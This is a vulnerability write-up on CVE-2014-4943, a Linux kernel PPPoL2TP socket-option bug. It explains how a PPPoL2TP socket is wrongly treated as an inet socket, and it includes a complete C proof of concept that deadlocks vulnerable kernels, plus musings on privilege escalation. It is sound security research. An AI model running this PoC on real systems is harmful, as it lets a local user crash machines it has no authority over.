CVE-2014-4943 - PPPoL2TP DoS Analysis

Introduction

I've been meaning to look at this issue for a while now but kept postponing it due to other commitments. When I had an initial look at this vulnerability, I thought it was either a use-after-free issue or some arbitrary memory overwrite due to differences between pppol2tp and udp/inet sockets.

This vulnerability was published in July 2014. The CVE description states: "The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure differences between an l2tp socket and an inet socket." The commit message of the fix in the git repository has some additional information:

net/l2tp: don't fall back on UDP [get|set]sockopt
The l2tp [get|set]sockopt() code has fallen back to the UDP functions
for socket option levels != SOL_PPPOL2TP since day one, but that has
never actually worked, since the l2tp socket isn't an inet socket.

As David Miller points out:

  "If we wanted this to work, it'd have to look up the tunnel and then
   use tunnel->sk, but I wonder how useful that would be"

Since this can never have worked so nobody could possibly have depended
on that functionality, just remove the broken code and return -EINVAL.

There's currently a public DoS exploit and a privilege escalation exploit for 32-bit systems from Immunity (no source code is available for the latter). I've had some time to perform an initial analysis of the DoS condition and will describe my findings below. Hopefully, this will provide some insight into the vulnerability and, possibly, its successful exploitation. I haven't figured out the privilege escalation part yet and would appreciate any tips or ideas. You can contact me on twitter or directly by email.

Before getting into details, it's worth mentioning that the DoS exploit does not "panic" the kernel as stated by the author but simply deadlocks the kernel. There's no kernel oops and the kernel control flow gets stuck in __ticket_spin_lock:

for (;;) { 
        if (inc.head == inc.tail)
                break;
        cpu_relax();
        inc.head = ACCESS_ONCE(lock->tickets.head);
}

The public PoC creates and connects two PX_PROTO_OL2TP sockets, which is not necessary to trigger the deadlock. A simplified PoC that deadlocks the kernel is shown below:

#define _GNU_SOURCE 1
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <linux/net.h>
#include <linux/udp.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <linux/if_pppol2tp.h>

int main()
{
        int tunnel_fd, udp_fd;
        struct sockaddr_pppol2tp sax;

        tunnel_fd = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
        udp_fd = socket(AF_INET, SOCK_DGRAM, 0);

        memset(&sax, 0, sizeof(sax));
        sax.sa_family = AF_PPPOX;
        sax.sa_protocol = PX_PROTO_OL2TP;
        sax.pppol2tp.fd = udp_fd;
        sax.pppol2tp.addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        sax.pppol2tp.addr.sin_port = htons(1337);
        sax.pppol2tp.addr.sin_family = AF_INET;
        sax.pppol2tp.s_tunnel = 8;
        sax.pppol2tp.s_session = 0;
        sax.pppol2tp.d_tunnel = 0;
        sax.pppol2tp.d_session = 0;

        connect(tunnel_fd, (struct sockaddr *)&sax, sizeof(sax));
        int ip_options = 0x1;
        setsockopt(tunnel_fd, SOL_IP, IP_OPTIONS, &ip_options, 20); // deadlock
        exit(0);
}

Vulnerability

The vulnerability is in handling (set|get)sockopt operations for PX_PROTO_OL2TP sockets:

static int pppol2tp_setsockopt(struct socket *sock, int level, int optname,
                               char __user *optval, unsigned int optlen)
{
        struct sock *sk = sock->sk;
        struct l2tp_session *session;
        struct l2tp_tunnel *tunnel;
        struct pppol2tp_session *ps;
        int val;
        int err;

        if (level != SOL_PPPOL2TP)
                return udp_prot.setsockopt(sk, level, optname, optval, optlen);   [1]

        if (optlen < sizeof(int))
                return -EINVAL;
        ...

In [1], if the level is not SOL_PPPOL2TP, udp_prot.setsockopt() is called even though the socket is not a UDP socket! The implementation of the udp_prot.setsockopt() is shown below:

int udp_setsockopt(struct sock *sk, int level, int optname,
                   char __user *optval, unsigned int optlen)
{
        if (level == SOL_UDP  ||  level == SOL_UDPLITE)
                return udp_lib_setsockopt(sk, level, optname, optval, optlen,
                                          udp_push_pending_frames);
        return ip_setsockopt(sk, level, optname, optval, optlen);                 [2]
}

As shown in [2], if the socket level is set to SOL_IP, the ip_setsockopt() is called on the PX_PROTO_OL2TP socket. The ip_setsockopt() then calls a helper function shown below:

static int do_ip_setsockopt(struct sock *sk, int level,
                            int optname, char __user *optval, unsigned int optlen)
{
        struct inet_sock *inet = inet_sk(sk);                                     [3]
        int val = 0, err;

        switch (optname) {
        case IP_PKTINFO:
        case IP_RECVTTL:
        ...

In [3], our socket is cast to an inet socket with (struct inet_sock *)sk. The sock struct is 656 bytes in size; the inet_sock struct embeds the sock struct as its first member and is 824 bytes. Setting inet options therefore operates on the 824 - 656 = 168 bytes that are specific to inet_sock. Since our socket is not an inet_sock, those writes land in whatever follows the sock struct in the allocation. Here that is a struct ppp_channel, i.e., the PPPoX socket is laid out as a sock struct immediately followed by a ppp_channel.

The PoC code uses the setsockopt optname IP_OPTIONS which does the following in do_ip_setsockopt():

        switch (optname) {
        case IP_OPTIONS:
        {
                struct ip_options_rcu *old, *opt = NULL;

                if (optlen > 40)
                        goto e_inval;
                err = ip_options_get_from_user(sock_net(sk), &opt,                [4]
                                               optval, optlen);
                if (err)
                        break;
                old = rcu_dereference_protected(inet->inet_opt,
                                                sock_owned_by_user(sk));
                if (inet->is_icsk) {
                        struct inet_connection_sock *icsk = inet_csk(sk);
#if IS_ENABLED(CONFIG_IPV6)
                        if (sk->sk_family == PF_INET ||
                            (!((1 << sk->sk_state) &
                               (TCPF_LISTEN | TCPF_CLOSE)) &&
                             inet->inet_daddr != LOOPBACK4_IPV6)) {
#endif
                                if (old)
                                        icsk->icsk_ext_hdr_len -= old->opt.optlen;
                                if (opt)
                                        icsk->icsk_ext_hdr_len += opt->opt.optlen;
                                icsk->icsk_sync_mss(sk, icsk->icsk_pmtu_cookie);
#if IS_ENABLED(CONFIG_IPV6)
                        }
#endif
                }
                rcu_assign_pointer(inet->inet_opt, opt);                          [5]
                if (old)
                        kfree_rcu(old, rcu);
                break;
        }
        case IP_PKTINFO:
        ...

In [4], an ip_options_rcu struct is allocated, and in [5] inet->inet_opt is set to point to it. The inet->inet_opt pointer sits at the same offset as the ppp member of the adjacent struct ppp_channel. Hence, setting inet->inet_opt overwrites the channel's ppp pointer with a valid kernel pointer to a struct ip_options_rcu.

Finally, when closing the PPPOL2TP socket, the ppp_unregister_channel() function is called:

void
ppp_unregister_channel(struct ppp_channel *chan)
{
        struct channel *pch = chan->ppp;
        struct ppp_net *pn;

        if (!pch)                                                                 [6]
                return;         /* should never happen */

        chan->ppp = NULL;

        /*
         * This ensures that we have returned from any calls into the
         * the channel's start_xmit or ioctl routine before we proceed.
         */
        down_write(&pch->chan_sem);
        spin_lock_bh(&pch->downl);
        pch->chan = NULL;
        spin_unlock_bh(&pch->downl);
        up_write(&pch->chan_sem);
        ...

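In [6], the overwritten ppp value is checked. Since it is non-NULL and points to a valid allocated memory region in kernel space, the function proceeds to the locking that follows, treating that memory as a struct channel. The memory was never initialised as one, so the lock state it reads is arbitrary data. This is where the deadlock happens.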

Exploitation Vectors

I haven't explored the udp_lib_setsockopt() path (levels SOL_UDP and SOL_UDPLITE) yet. For the ip_setsockopt() path, I couldn't find any function or data pointers that can be overwritten to redirect the control flow to user space.

A possible exploitation vector is to take advantage of the struct adjacency by forcing structs containing function pointers to be allocated close to the PPPOL2TP socket struct. As mentioned above, there's a 32-bit exploit and it looks like this exploit is taking advantage of some race condition. I haven't verified this on a 32-bit system and it's possible that function or data pointers are aligned differently and are easier to exploit.